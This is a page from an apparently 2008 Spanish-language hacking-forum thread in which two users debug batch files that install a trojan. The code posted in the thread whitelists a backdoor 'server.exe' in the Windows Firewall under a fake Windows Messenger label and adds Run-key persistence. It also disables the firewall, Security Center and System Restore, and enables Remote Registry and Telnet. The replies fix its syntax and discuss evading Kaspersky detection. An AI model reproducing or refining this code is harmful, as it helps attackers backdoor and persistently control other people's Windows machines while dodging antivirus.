elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Como hacer funcionar este batch perfectamente?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 [6] 7 Ir Abajo Respuesta Imprimir
Autor Tema: Como hacer funcionar este batch perfectamente?  (Leído 34,723 veces)
SoloAki

Desconectado Desconectado

Mensajes: 222


Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #50 en: 8 Marzo 2008, 17:06 pm »

Hola si el primero es ctfmon.bat y el segundo es lsaas.bat si los voy a compilar luego osea que los tendria que modificar por .exe a algunas partes :p el primero que hace todo lo que dice y llama al segundo si existe. El segundo bat seria el que se fija si existe ctmon.bat y sino existe vuelve a crearla, creo que los 2 bat estan bien. Pero los ejecute en modo .bat en un cyber mas tarde te digo la ventana del cmd de los bat porque no me reconoce algunas cosas. Como /v y otras cosas si puedo voy a ejecutarlos en el cyber en .bat para no tener errores. Espero respuesta tuya :)


En línea

Stacker

Desconectado Desconectado

Mensajes: 87



Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #51 en: 8 Marzo 2008, 18:29 pm »

Ya lo veo más claro. La parte en rojo (segundo código) tiene que ser ctfmon.bat, ya que es el valor de clave run a restaurar, iba un poco con prisa la ultima vez. ;)
A parte de eso, todo bien.

Espero las capturas del cyber para solucionar los errores que pueda haber.

Saludos



En línea

SoloAki

Desconectado Desconectado

Mensajes: 222


Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #52 en: 7 Abril 2008, 05:24 am »

Mira estas son las 2 cositas que me tira..  y nose porqué con respecto a este .bat

Código:
@echo off
:inicio
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v server.exe /t REG_SZ /d "%windir%\ctfmon\1234\server.exe:*:Enabled:  Windows Messenger"
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v ctfmon.bat /d %windir%\system32\2114\ctfmon.bat /f
if exist %windir%\system32\2114\lsass.exe ( start %windir%\system32\2114\lsass.exe )
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
inicio:
if exist %windir%\system32\2114\system32.exe ( start /min %windir%\system32\2114\system32.exe )
ping -n 100 localhost > nul
goto inicio

Estas son las 2 cosas que me tira

http://www.subirimagenes.com/otros-asd0001-295568.html

Ahi el error ese /v solamente. y el otro error que nose ve es algo asi: "inicio:" nose reconoce como coso interno o externo,etc.. Sabes porque?
En línea

Stacker

Desconectado Desconectado

Mensajes: 87



Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #53 en: 8 Abril 2008, 20:59 pm »

El /v no se reconoce... tiene que ser porque has pasado a partir de ahí a otra línea (has partido el comando reg add).

Y el de inicio: no se reconoce... es porque los dos puntos tienen que ir al principio de la etiqueta y por otro lado no se pueden repetir las etiquetas (puedes poner :inicio2 o cualquier otra).

Prueba esto creo que deberia funcionar perfectamente.

Otra cosa, creo que es mejor cambiar el orden en el apartado de los servicios, es decir, primero cambiar el valor del registro y luego intentar iniciarlo (para el caso en que estuviera deshabilitado).

Saludos

En línea

SoloAki

Desconectado Desconectado

Mensajes: 222


Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #54 en: 9 Abril 2008, 20:20 pm »

Hola si probe no entendi lo del reg add.. eso creo que esta bien va separado
reg add el problema del inicio lo solucione gracias pero lo otro es el problema para agregar la exclusion en el firewall de windows el /v server.exe intente sacando el /v y no me tiro mas el error pero me lo tiro con el server.exe nose reconoe como un comando interno o externo bla bla.. nose porqué no esta bien la exclusion?
En línea

Stacker

Desconectado Desconectado

Mensajes: 87



Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #55 en: 9 Abril 2008, 21:07 pm »

Hola

El comando:
Código:
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v server.exe
/t REG_SZ /d "%windir%\ctfmon\1234\server.exe:*:Enabled:  Windows Messenger"
debe de ir todo en una línea, /v es un parámetro del comando. Por eso si lo pones en una línea aparte salta un error, ya que no se reconoce como un comando ni como un ejecutable. Al quitar /v se queda como principio de línea server.exe y por la misma razón vuelve a aparecer el error pero con server.exe.

Si te das cuenta dejándolo dividido en dos líneas, la primera queda: reg add [clave] que solo crea una clave de registro vacia. Y la segunda línea ya que solo son parámetros no hace nada y devuelve un error.

En línea

SoloAki

Desconectado Desconectado

Mensajes: 222


Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #56 en: 10 Abril 2008, 03:33 am »

Ah.. listo ya lo puse a la exclusion todo en una linea ahora lo pruebo y te digo despues.... lo otro esta bien ya creo.

Esto...

Citar
:r
ping 127.0.0.1 /n 120
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon
if %errorlevel%==1 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon /d "%windir%\system32\2114\ctfmon.bat" /f
goto r

Desde re querry hasta /f va todo en una linea?
En línea

Stacker

Desconectado Desconectado

Mensajes: 87



Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #57 en: 10 Abril 2008, 18:24 pm »

No, en este caso el reg query ... llega hasta /v ctfmon, que consulta la clave. Y en la otra línea otro comando (if) que comprueba si se pudo realizar la consulta, si no, es que la clave no existe y la vuelve a crear.

En línea

SoloAki

Desconectado Desconectado

Mensajes: 222


Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #58 en: 10 Abril 2008, 20:00 pm »

Ah ok.. creo que ya esta.. supongo :P el kaspersky se capta de alguna modificacion asi en el registro y demas por mi .bat? espero que no asi no me delata xD
« Última modificación: 10 Abril 2008, 20:03 pm por SoloAki » En línea

Stacker

Desconectado Desconectado

Mensajes: 87



Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #59 en: 11 Abril 2008, 16:48 pm »

Con el Kaspersky (y culaquier otro antivirus "convencional") no se pueden detectar éstos cambios en el registro. Lo único que puede darte problemas del Kaspersky es el firewall si está activo.  - Además de que no detecte el troyano...  ;)

Saludos
En línea

Páginas: 1 2 3 4 5 [6] 7 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Porque no puedo hacer ping ??? y sin embargo mi navegador entra perfectamente???
Redes
The_Saint 4 17,780 Último mensaje 9 Junio 2011, 23:48 pm
por madpitbull_99
Como hacer una consola batch
Scripting
zikotik 4 3,558 Último mensaje 8 Julio 2013, 17:43 pm
por OmarHack
Configura perfectamente tu WiFi con este programa
Noticias
wolfbcn 0 1,282 Último mensaje 10 Enero 2016, 21:22 pm
por wolfbcn
(solucionado) no consigo hacer funcionar un codigo batch
Scripting
hckcrck 6 4,191 Último mensaje 17 Junio 2016, 17:47 pm
por hckcrck
Hacer funcionar el lector de bandeja de discos con este lenguaje .net
.NET (C#, VB.NET, ASP)
Meta 7 6,576 Último mensaje 19 Noviembre 2017, 01:52 am
por Meta
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines